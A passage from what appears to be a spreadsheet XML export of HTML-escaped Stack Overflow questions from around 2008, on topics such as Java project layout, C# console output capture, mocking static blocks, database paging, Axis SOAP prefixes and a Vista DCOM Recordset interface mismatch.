&lt;p&gt;I recently used a &lt;a href="http://maven.apache.org/guides/introduction/introduction-to-the-standard-directory-layout.html"&gt;Maven structure&lt;/a&gt; for a java project, but I am not sure it's the best structure for a non-maven driven project.&lt;/p&gt;
&lt;p&gt;So, I have two questions: When you guys start new projects, what structure you use? And: What if you need to integrate two different languages, like for example java classes into a PHP application; PHP files are source files, web files, you you use a /src, /classes, webapps/php ? What are your choices in such scenarios. &lt;/p&gt;
&lt;p&gt;As a note: I am wondering also what are you choices for directories names. I like the 3-letters names (src, lib, bin, web, img, css, xml, cfg) but what are your opinions about descriptive names like libraris, sources or htdocs/public_html ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to save the output of a console application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need advice on how to have my C# console application display text to the user through the standard output while still being able access it later on. The actual feature I would like to implement is to dump the entire output buffer to a text file at the end of program execution.&lt;/p&gt;
&lt;p&gt;The workaround I use while I don't find a cleaner approach is to subclass &lt;code&gt;TextWriter&lt;/code&gt; overriding the writing methods so they would both write to a file and call the original stdout writer. Something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class DirtyWorkaround {
  private class DirtyWriter : TextWriter {
    private TextWriter stdoutWriter;
    private StreamWriter fileWriter;
    public DirtyWriter(string path, TextWriter stdoutWriter) {
      this.stdoutWriter = stdoutWriter;
      this.fileWriter = new StreamWriter(path);
    }
    override public void Write(string s) {
      stdoutWriter.Write(s);
      fileWriter.Write(s);
      fileWriter.Flush();
    }
    // Same as above for WriteLine() and WriteLine(string),
    // plus whatever methods I need to override to inherit
    // from TextWriter (Encoding.Get I guess).
  }
  public static void Main(string[] args) {
    using (DirtyWriter dw = new DirtyWriter("path", Console.Out)) {
      Console.SetOut(dw);
      // Teh codez
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;See that it writes to and flushes the file all the time. I'd love to do it only at the end of the execution, but I couldn't find any way to access to the output buffer.&lt;/p&gt;
&lt;p&gt;Also, excuse inaccuracies with the above code (had to write it &lt;em&gt;ad hoc&lt;/em&gt;, sorry ;).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mocking Static Blocks in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My motto for Java is "just because Java has static blocks, it doesn't mean that you should be using them." Jokes aside, there are a lot of tricks in Java that make testing a nightmare. Two of the most I hate are Anonymous Classes and Static Blocks. We have a lot of legacy code that make use of Static Blocks and these are one of the annoying points in our push in writing unit tests. Our goal is to be able to write unit tests for classes that depend on this static initialization with minimal code changes. &lt;/p&gt;
&lt;p&gt;So far my suggestion to my colleagues is to move the body of the static block into a private static method and call it &lt;code&gt;staticInit&lt;/code&gt;. This method can then be called from within the static block. For unit testing another class that depends on this class could easily mock &lt;code&gt;staticInit&lt;/code&gt; with JMockit to not do anything. Let's see this in example.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class ClassWithStaticInit {
  static {
    System.out.println("static initializer.");
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Will be changed to&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class ClassWithStaticInit {
  static {
    staticInit();
  }
  private static void staticInit() {
    System.out.println("static initialized.");
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So that we can do the following in a JUnit.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class DependentClassTest {
  public static class MockClassWithStaticInit {
    public static void staticInit() {
    }
  }
  @BeforeClass
  public static void setUpBeforeClass() {
    Mockit.redefineMethods(ClassWithStaticInit.class, MockClassWithStaticInit.class);
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However this solution also comes with its own problems. You can't run &lt;code&gt;DependentClassTest&lt;/code&gt; and &lt;code&gt;ClassWithStaticInitTest&lt;/code&gt; on the same JVM since you actually want the static block to run for &lt;code&gt;ClassWithStaticInitTest&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;What would be your way of accomplishing this task? Or any better, non-JMockit based solutions that you think would work cleaner?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Web in a desktop application: Good web browser controls?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been utlising a "web browser control" in desktop based applications (in my case Windows Forms .NET) for a number of years.  I mostly use it to create a familiar flow-based user interface that also allows a seamless transition to the internet where required.&lt;/p&gt;
&lt;p&gt;I'm really tired of the IE browser control because of the poor quality html it generates on output.  Also,  I guess that it is really just IE7 behind the scenes and so has many of that browser "issues".  Despite this, it is quite a powerful control and provides rich interaction with your desktop app.&lt;/p&gt;
&lt;p&gt;So, what other alternatives to the IE browser control are there?  I looked at a Mosaic equivalent a year ago but was disappointed with the number of unimplemented features, maybe this has improved recently?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a good, free WYSIWYG editor for creating HTML using a Django template?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm interested to get a free, WYSIWYG HTML editor that is compatible with Django template. Any ideas?&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Thanks LainMH.&lt;/p&gt;
  &lt;p&gt;But I afraid fckeditor is used in web app, for the purpose of editing
  HTML. What I want is an editor that allows me to write HTML that is
  Django compatible. &lt;/p&gt;
  &lt;p&gt;Hope this clarifies the issue.&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>DIV's vs. Tables or CSS vs. Being Stupid</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know that tables are for tabular data, but it's so tempting to use them for layout. I can handle DIV's to get a three column layout, but when you got 4 nested DIV's, it get tricky. &lt;/p&gt;
&lt;p&gt;Is there a tutorial/reference out there to persuade me to use DIV's for layout?&lt;/p&gt;
&lt;p&gt;I want to use DIV's, but I refuse to spend an hour to position my DIV/SPAN where I want it.&lt;/p&gt;
&lt;p&gt;@GaryF: &lt;a href="http://www.blueprintcss.org/"&gt;Blueprint CSS&lt;/a&gt; has to be the CSS's best kept secret.&lt;/p&gt;
&lt;p&gt;Great tool - &lt;a href="http://kematzy.com/blueprint-generator/"&gt;Blueprint Grid CSS Generator&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the pros and cons of the SVN plugins for Eclipse, Subclipse and Subversive?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;SVN in Eclipse is spread into 2 camps. The SVN people have developed a plugin called &lt;a href="http://subclipse.tigris.org/"&gt;Subclipse&lt;/a&gt;. The Eclipse people have a plugin called &lt;a href="http://www.eclipse.org/subversive/"&gt;Subversive&lt;/a&gt;. Broadly speaking they both do the same things. What are the advantages and disadvantages of each?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What Makes a Good Unit Test?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm sure most of you are writing lots of automated tests and that you also have run into some common pitfalls when unit testing. &lt;/p&gt;
&lt;p&gt;My question is do you follow any rules of conduct for writing tests in order to avoid problems in the future? To be more specific: What are the &lt;strong&gt;properties of good unit tests&lt;/strong&gt; or how do you write your tests?&lt;/p&gt;
&lt;p&gt;Language agnostic suggestions are encouraged.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I access the backing variable of an auto-implemented property?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the past we declared properties like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MyClass
{
    private int _age;
    public int Age
    {
          get{ return _age;  }
          set{ _age = value; }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now we can do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MyClass
{
    public int Age {get; set;} 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My question is, how can I access the private variable that is created automatically using this notation?  &lt;/p&gt;
&lt;p&gt;I would rather access the private variable and not the public accessor 'Age'. Is there a default notation to access the private variable, or it is just not possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the pros and cons of object databases?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There is a lot of information out there on object-relational mappers and how to best avoid impedance mismatch, all of which seem to be moot points if one were to use an object database.  My question is why isn't this used more frequently?  Is it because of performance reasons or because object databases cause your data to become proprietary to your application or is it due to something else?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to work around a very large 2d array in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to create a 2D int array of size 800x800.  But doing so creates a stack overflow (ha ha).&lt;/p&gt;
&lt;p&gt;I'm new to C++, so should I do something like a vector of vectors?  And just encapsulate the 2d array into a class?&lt;/p&gt;
&lt;p&gt;Specifically, this array is my zbuffer in a graphics program.  I need to store a z value for every pixel on the screen (hence the large size of 800x800).&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to implement database engine independent paging?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Task: implement paging of database records suitable for different RDBMS. Method should work for mainstream engines - MSSQL2000+, Oracle, MySql, etc.&lt;/p&gt;
&lt;p&gt;Please don't post RDBMS specific solutions, I know how to implement this for most of the modern database engines. I'm looking for the universal solution. Only temporary tables based solutions come to my mind at the moment.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;br /&gt;
I'm looking for SQL solution, not 3rd party library.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Browser WYSIWYG best practices</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using a rich text editor on a web page.  .NET has feature that prevent one from posting HTML tags, so I added a JavaScript snippet to change the angle brackets to and alias pair of characters before the post. The alias is replaced on the server with the necessary angle bracket and then stored in the database.  With XSS aside, what are common ways of fixing this problem. (i.e. Is there a better way?)&lt;/p&gt;
&lt;p&gt;If you have comments on XSS(cross-site scripting), I'm sure that will help someone.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to asynchronously filter an IList?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, so there has to be a way to do this... no? If not I'd love some ideas. &lt;/p&gt;
&lt;p&gt;I have two repeaters and an image inside an update panel along with some AJAX dropdowns with link buttons to the left. I want to update the data inside the update panel as fast as possible as values are selected from the dropdowns. &lt;/p&gt;
&lt;p&gt;What do you think would be the best way to update the data? The repeaters are populated by objects, so if I could just filter the objects by some properties I could end up with the correct data. No new data from the server is needed. &lt;/p&gt;
&lt;p&gt;Anyone have some ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sum of items in a collection</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using LINQ to SQL, I have an Order class with a collection of OrderDetails.  The Order Details has a property called LineTotal which gets Qnty x ItemPrice. &lt;/p&gt;
&lt;p&gt;I know how to do a new LINQ query of the database to find the order total, but as I already have the collection of OrderDetails from the DB, is there a simple method to return the sum of the LineTotal directly from the collection?&lt;/p&gt;
&lt;p&gt;I'd like to add the order total as a property of my Order class. I imagine I could loop through the collection and calculate the sum with a for each Order.OrderDetail, but I'm guessing there is a better way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ADO.NET Entity Framework tutorials</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of any good tutorials on ADO.NET Entity Framework?&lt;/p&gt;
&lt;p&gt;There are a few useful links here at &lt;a href="http://stackoverflow.com/questions/42826/where-to-start-with-entity-framework"&gt;Stack OverFlow&lt;/a&gt;, and I've found one tutorial at &lt;a href="http://dotnet-architecture-jdo.blogspot.com/2008/08/adonet-entity-framework-part.html"&gt;Jason's DotNet Architecture Blog&lt;/a&gt;, but can anyone recommend any other good tutorials? 
Any tutorials available from Microsoft, either online or as part of any conference/course material?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to save jpg image to database and then load it in Delphi using FIBplus and TImage?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I save a jpg image to database and then load it in Delphi using FIBplus and TImage?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does pop_back() really invalidate *all* iterators on an std::vector?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;std::vector&amp;lt;int&amp;gt; ints;
// ... fill ints with random values
for(std::vector&amp;lt;int&amp;gt;::iterator it = ints.begin(); it != ints.end(); )
{
    if(*it &amp;lt; 10)
    {
        *it = ints.back();
        ints.pop_back();
        continue;
    }
    it++;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code is not working because when &lt;code&gt;pop_back()&lt;/code&gt; is called, &lt;code&gt;it&lt;/code&gt; is invalidated. But I don't find any doc talking about invalidation of iterators in &lt;code&gt;std::vector::pop_back()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Do you have some links about that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regular expression that rejects all input?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is is possible to construct a regular expression that rejects all input strings?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get Axis 1.4 to not generate several prefixes for the same XML namespace?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am receiving SOAP requests from a client that uses the Axis 1.4 libraries. The requests have the following form:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" 
                  xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
                  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"&amp;gt;
  &amp;lt;soapenv:Body&amp;gt;
    &amp;lt;PlaceOrderRequest xmlns="http://example.com/schema/order/request"&amp;gt;
      &amp;lt;order&amp;gt;
        &amp;lt;ns1:requestParameter xmlns:ns1="http://example.com/schema/common/request"&amp;gt;
          &amp;lt;ns1:orderingSystemWithDomain&amp;gt;
            &amp;lt;ns1:orderingSystem&amp;gt;Internet&amp;lt;/ns1:orderingSystem&amp;gt;
            &amp;lt;ns1:domainSign&amp;gt;2&amp;lt;/ns1:domainSign&amp;gt;
          &amp;lt;/ns1:orderingSystemWithDomain&amp;gt;
        &amp;lt;/ns1:requestParameter&amp;gt;
        &amp;lt;ns2:directDeliveryAddress ns2:addressType="0" ns2:index="1" 
                                   xmlns:ns2="http://example.com/schema/order/request"&amp;gt;
          &amp;lt;ns3:address xmlns:ns3="http://example.com/schema/common/request"&amp;gt;
            &amp;lt;ns4:zipcode xmlns:ns4="http://example.com/schema/common"&amp;gt;12345&amp;lt;/ns4:zipcode&amp;gt;
            &amp;lt;ns5:city xmlns:ns5="http://example.com/schema/common"&amp;gt;City&amp;lt;/ns5:city&amp;gt;
            &amp;lt;ns6:street xmlns:ns6="http://example.com/schema/common"&amp;gt;Street&amp;lt;/ns6:street&amp;gt;
            &amp;lt;ns7:houseNum xmlns:ns7="http://example.com/schema/common"&amp;gt;1&amp;lt;/ns7:houseNum&amp;gt;
            &amp;lt;ns8:country xmlns:ns8="http://example.com/schema/common"&amp;gt;XX&amp;lt;/ns8:country&amp;gt;
          &amp;lt;/ns3:address&amp;gt;
[...]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, several prefixes are defined for the same namespace, e.g. the namespace &lt;a href="http://example.com/schema/common"&gt;http://example.com/schema/common&lt;/a&gt; has the prefixes ns4, ns5, ns6, ns7 and ns8. Some long requests define several hundred prefixes for the same namespace.&lt;/p&gt;
&lt;p&gt;This causes a problem with the &lt;a href="http://saxon.sourceforge.net/"&gt;Saxon&lt;/a&gt; XSLT processor, that I use to transform the requests. Saxon limits the the number of different prefixes for the same namespace to 255 and throws an exception when you define more prefixes.&lt;/p&gt;
&lt;p&gt;Can Axis 1.4 be configured to define smarter prefixes, so that there is only one prefix for each namespace?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to prevent IE6 from refetching already-fetched images added via DOM manipulation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you add a image to your browser's DOM, IE6 will not check its cache to see if it already downloaded the image but will, instead, re-retrieve it from the server.  I have not found any combination of HTTP response headers (of the ensuing image request) to convince IE6 that it can cache the image:  Cache-control, Expires, Last-modified.&lt;/p&gt;
&lt;p&gt;Some suggest you can return a 304 of the subsequent image requests to tell IE6 "you already got it" but I want to avoid the whole round trip to the server in the first place.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I move a file (or folder) from one folder to another in TortoiseSVN?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to move a file or folder from one place to another within the same repository without having to use Repo Browser to do it, and without creating two independent add/delete operations.  Using Repo Browser works fine except that your code will be hanging in a broken state until you get any supporting changes checked in afterwards (like the .csproj file for example).&lt;/p&gt;
&lt;p&gt;Update: People have suggested "move" from the command line. Is there a TortoiseSVN equivalent?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Saving Java Object Graphs as XML file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the simplest-to-use techonlogy available to save an arbitrary Java object graph as an XML file (and to be able to rehydrate the objects later)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IIS crashes when serving an ASP.NET application under heavy load. How to troubleshoot it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on an ASP.NET web application, it seems to be working properly when I try to debug it in Visual Studio. However when I emulate heavy load, IIS crashes without any trace -- log entry in the system journal is very generic, "The World Wide Web Publishing service terminated unexpectedly. It has done this 4 time(s)."
How is it possible to get more information from IIS to troubleshoot this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Exceptions not passed correctly thru RCF (using Boost.Serialization)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use RCF with boost.serialization (why use RCF's copy when we already use the original?) It works OK, but when an exception is thrown in the server, it's not passed correctly to the client. Instead, I get an RCF::SerializationException quoting an &lt;code&gt;archive_exception&lt;/code&gt; saying "class name too long". When I change the protocol to BsText, the exceptions is "unregistered class". When I change the protocol to SfBinary, it works.
I've registered RemoteException on both server and client like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;BOOST_CLASS_VERSION(RCF::RemoteException, 0)
BOOST_CLASS_EXPORT(RCF::RemoteException)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I even tried serializing and deserializing a &lt;code&gt;boost::shared_ptr&amp;lt;RCF::RemoteException&amp;gt;&lt;/code&gt; in the same test, and it works.&lt;/p&gt;
&lt;p&gt;So how can I make RCF pass exceptions correctly without resorting to SF?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>using asynchbeans instead of native jdk threads</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;are there any performance limitations using IBM's asynchbeans? 
my apps jvm core dumps are showing numerous occurences of orphaned threads. Im currently using native jdk unmanaged threads. Is it worth changing over to managed threads?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get an auto-scrolling text display on .NET forms - e.g. for credits</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Need to show a credits screen where I want to acknowledge the many contributors to my application. &lt;/p&gt;
&lt;p&gt;Want it to be an automatically scrolling box, much like the credits roll at the end of the film.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>BufferedImage in IKVM</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best and/or easiest way to replace the missing BufferedImage functionality for a Java project I am converting to .NET with IKVM?&lt;/p&gt;
&lt;p&gt;I'm basically getting "cli.System.NotImplementedException: BufferedImage" exceptions when running the application, which otherwise runs fine.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Surrogate vs. natural/business keys</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here we go again, the old argument still arises... &lt;/p&gt;
&lt;p&gt;Would we better have a business key as a primary key, or would we rather have a surrogate id (i.e. an SQL Server identity) with a unique constraint on the business key field? &lt;/p&gt;
&lt;p&gt;Please, provide examples or proof to support your theory.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Scrum Process Management - Tips, Pitfalls, Ideas</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been doing scrum with a team for a while, but things seem messy for some reasons. I've been thinking on how they could be changed and have a couple of questions that I would like to raise here.  &lt;/p&gt;
&lt;p&gt;First, what should be the role of testers, designers and non-developers as a whole in the Scrum process?
If they are equal to other team members a couple of issues arise. Designers and testers usually work on a task after development is done, so they cannot adequately plan for a sprint because of this dependency.  &lt;/p&gt;
&lt;p&gt;Second, we have deadlines. These are strict and have a lot of impact on prioritization. The end result is backlog changes in the middle of a sprint because of deadline changes, or bad results in the end of the sprint.
We also have a lot of non-technical work like customer support that has to be done in the meantime and cannot be planned as it varies a lot.
So I'm thinking that the team structure, culture and practices are kind of not compatible with Scrum. Scrum for me is a process management tool for teams working on the development of a single software product.  &lt;/p&gt;
&lt;p&gt;What do you guys think about applying it in more specific and complicated scenarios? Do you have any experience to share?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Add Custom TextboxCell to a DataGridView control that contains a button to open the FileDialog</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to add a DataGridViewTextBoxCell cell to a DataGridViewCell control, but as well as being able to type in the text cell as normal it must also contain a '...' button that once clicks brings up the OpenFileDialog window to allow the user to select a file. Once selected, the text cell will be populated with the full file path.&lt;/p&gt;
&lt;p&gt;What is the best way to go about this?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to build a string of delimited items in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While working in a Java app, I recently needed to assemble a comma-delimited list of values to pass to another web service without knowing how many elements there would be in advance. The best I could come up with off the top of my head was something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public String appendWithDelimiter( String original, String addition, String delimiter ) {
    if ( original.equals( "" ) ) {
        return addition;
    } else {
        return original + delimiter + addition;
    }
}
String parameterString = "";
if ( condition ) parameterString = appendWithDelimiter( parameterString, "elementName", "," );
if ( anotherCondition ) parameterString = appendWithDelimiter( parameterString, "anotherElementName", "," );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I realize this isn't particularly efficient, since there are strings being created all over the place, but I was going for clarity more than optimization.&lt;/p&gt;
&lt;p&gt;In Ruby, I can do something like this instead, which feels much more elegant:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;parameterArray = [];
parameterArray &amp;lt;&amp;lt; "elementName" if condition;
parameterArray &amp;lt;&amp;lt; "anotherElementName" if anotherCondition;
parameterString = parameterArray.join(",");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But since Java lacks a join command, I couldn't figure out anything equivalent.&lt;/p&gt;
&lt;p&gt;So, what's the best way to do this in Java?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to build a Flash 9 SWF from an FLA file without using the Flash IDE?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Two reasons this would be useful, in case there's some other way to achieve these goals:
1) Building in the Flash IDE is really slow; I was hoping a third-party compiler would be faster.
2) It would be nice to be able to build projects on machines that don't have the Flash IDE installed.
I'm familiar with other AS3 compilers that are out there, but I don't know of any that take FLA files as input.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you reliably get an IP address via DHCP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I work with embedded Linux systems that sometimes want to get their IP address from a DHCP server.  The DHCP Client client we use (&lt;a href="http://www.phystech.com/download/dhcpcd.html" rel="nofollow" title="DHCPCD"&gt;dhcpcd&lt;/a&gt;) has limited retry logic.  If our device starts up without any DHCP server available and times out, dhcpcd will exit and the device will never get an IP address until it's rebooted with a DHCP server visible/connected.  I can't be the only one that has this problem.  The problem doesn't even seem to be specific to embedded systems (though it's worse there).  How do you handle this?  Is there a more robust client available?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does Vista do stricter checking of Interface Ids in DCOM calls? (the Stub received bad Data)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I hope everyone will pardon the length, and narrative fashion, of this question.  I decided to describe the situation in some detail in my blog.  I later saw Joel's invitation to this site, and I thought I'd paste it here to see if anyone has any insight into the situation.&lt;/p&gt;
&lt;p&gt;I wrote, and now support, an application that consists of a Visual Basic thick client speaking DCOM to middle tier COM+ components written in C++ using ATL. It runs in all eight of our offices.  Each office hosts a back-end server that contains the COM+ application (consisting of 18 separate components) and the SQLServer. The SQLServer is typically on the same back-end server, but need not be.&lt;/p&gt;
&lt;p&gt;We recently migrated the back-end server in our largest office -- New York -- from a MSC cluster to a new virtual machine hosted on VMWare's ESX technology. Since the location of the COM+ application had moved from the old server to a new one with a different name, I had to redirect all the clients so that they activated the COM+ application on the new server. The procedure was old hat as I had done essentially the same thing for several of my smaller offices that had gone through similar infrastructure upgrades.&lt;/p&gt;
&lt;p&gt;All seemed routine and on Monday morning the entire office -- about 1,000 Windows XP workstations -- were running without incident on the new server. But then the call came from my mobile group -- there was an attorney working from home with a VPN connection that was getting a strange error after being redirected to the new server:&lt;/p&gt;
&lt;pre&gt;
Error on FillTreeView2 - The stub received bad data.
&lt;/pre&gt;
&lt;p&gt;Huh? I had never seen this error message before. Was it the new server? But all the workstations in the office were working fine. I told the mobile group to switch the attorney back to the old sever (which was still up), and the error disappeared. So what was the difference? Turns out this attorney was running Vista at home.&lt;/p&gt;
&lt;p&gt;We don't run Vista in any of our offices, but we do have some attorneys that run Vista at home (certainly some in my New York office). I do as well and I've never seen this problem. To confirm that there was an issue, I fired up my Vista laptop, pointed it to the new server, and got the same error. I pointed it back to the old server, and it worked fine. Clearly there was some problem with Vista and the components on the new server -- a problem that did not seem to affect XP clients. What could it be?&lt;/p&gt;
&lt;p&gt;Next stop -- the application error log on my laptop. This yielded more information on the error:&lt;/p&gt;
&lt;pre&gt;
Source:        Microsoft-Windows-RPC-Events
Date:          9/2/2008 11:56:07 AM
Event ID:      10
Level:         Error
Computer:      DevLaptop
Description:   Application has failed to complete a COM call because an incorrect
interface ID was passed as a parameter.
The expected Interface ID was 00000555-0000-0010-8000-00aa006d2ea4, 
The Interface ID returned was 00000556-0000-0010-8000-00aa006d2ea4.
User Action - Contact the application vendor for updated version of the application.
&lt;/pre&gt;
&lt;p&gt;The interface ids provided the clue I needed to unravel the mystery. The "expected" interface id identifies MDAC's Recordset interface -- specifically version 2.1 of that interface. The "returned" interface corresponds to a later version of Recordset (version 2.5 which differs from version 2.1 by the inclusion of one additional entry at the end of the vtable -- method Save).&lt;/p&gt;
&lt;p&gt;Indeed my component's interfaces expose many methods that pass Recordset as an output parameter. So were they suddenly returning a later version of Recordset -- with a different interface id? It certainly appeared to be the case. And then I thought, why should it matter. The vtable looks the same to clients of the older interface. Indeed, I suspect that if we were talking about in-process COM, and not DCOM, this apparently innocuous impedance mismatch would have been silently ignored and would have caused no issues.&lt;/p&gt;
&lt;p&gt;Of course, when process and machine boundaries come into play, there is a proxy and a stub between the client and the server. In this case, I was using type library marshaling with the free threaded marshaller. So there were two mysteries to solve:&lt;/p&gt;
&lt;p&gt;Why was I returning a different interface in the output parameters from methods on my new server?&lt;/p&gt;
&lt;p&gt;Why did this affect only Vista clients?&lt;/p&gt;
&lt;p&gt;As my server software was hosted on servers at each of my eight offices, I decided to try pointing my Vista client at all of them in sequence to see which had problems with Vista and which didn't. Illuminating test. Some of the older servers still worked with Vista but the newer ones did not. Although some of the older servers were still running Windows 2000 while the newer ones were at 2003, that did not seem to be the issue.&lt;/p&gt;
&lt;p&gt;After comparing the dates of the component DLLs it appeared that whenever the client pointed to servers with component DLLs dated before 2003 Vista was fine. But those that had DLLs with dates after 2003 were problematic. Believe it or nor, there were no (or at least no significant) changes to the code on the server components in many years. Apparently the differing dates were simply due to recompiles of my components on my development machine(s). And it appeared that one of those recompiles happened in 2003.&lt;/p&gt;
&lt;p&gt;The light bulb went on. When passing Recordsets back from server to client, my ATL C++ components refer to the interface as _Recordset. This symbol comes from the type library embedded within msado15.dll. This is the line I had in the C++ code:&lt;/p&gt;
&lt;pre&gt;
#import "c:\Program Files\Common Files\System\ADO\msado15.dll" no_namespace rename ( "EOF", "adoEOF" )
&lt;/pre&gt;
&lt;p&gt;Don't be deceived by the 15 in msdad15.dll. Apparently this DLL has not changed name in the long series of MDAC versions.&lt;/p&gt;
&lt;p&gt;When I compiled the application back in the day, the version of MDAC was 2.1. So _Recordset compiled with the 2.1 interface id and that is the interface returned by the servers running those components.&lt;/p&gt;
&lt;p&gt;All the client's use the COM+ application proxy that was generated (I believe) back in 1999. The type library that defines my interfaces includes the line:&lt;/p&gt;
&lt;pre&gt;
importlib("msado21.tlb");
&lt;/pre&gt;
&lt;p&gt;which explains why they expect version 2.1 of Recordset in my method's output parameters. Clearly the problem was with my 2003 recompile and the fact that at that time the _Recordset symbol no longer corresponded to version 2.1. Indeed _Recordset corresponded to the 2.5 version with its distinct interface id. The solution for me was to change all references from _Recordset to Recordset21 in my C++ code. I rebuilt the components and deployed them to the new server. Voila -- the clients seemed happy again.&lt;/p&gt;
&lt;p&gt;In conclusion, there are two nagging questions that remain for me.&lt;/p&gt;
&lt;p&gt;Why does the proxy/stub infrastructure seem to behave differently with Vista clients? It appears that Vista is making stricter checks of the interface ids coming back from method parameters than is XP.&lt;/p&gt;
&lt;p&gt;How should I have coded this differently back in 1999 so that this would not have happened? Interfaces are supposed to be immutable and when I recompiled under a newer version of MDAC, I inadvertently changed my interface because the methods now returned a different Recordset interface as an output parameter. As far as I know, the type library back then did not have a version-specific symbol -- that is, later versions of the MDAC type libraries define Recordset21, but that symbol was not available back in the 2.1 type library.&lt;/p&gt;
</t>
  </si>
  <si>
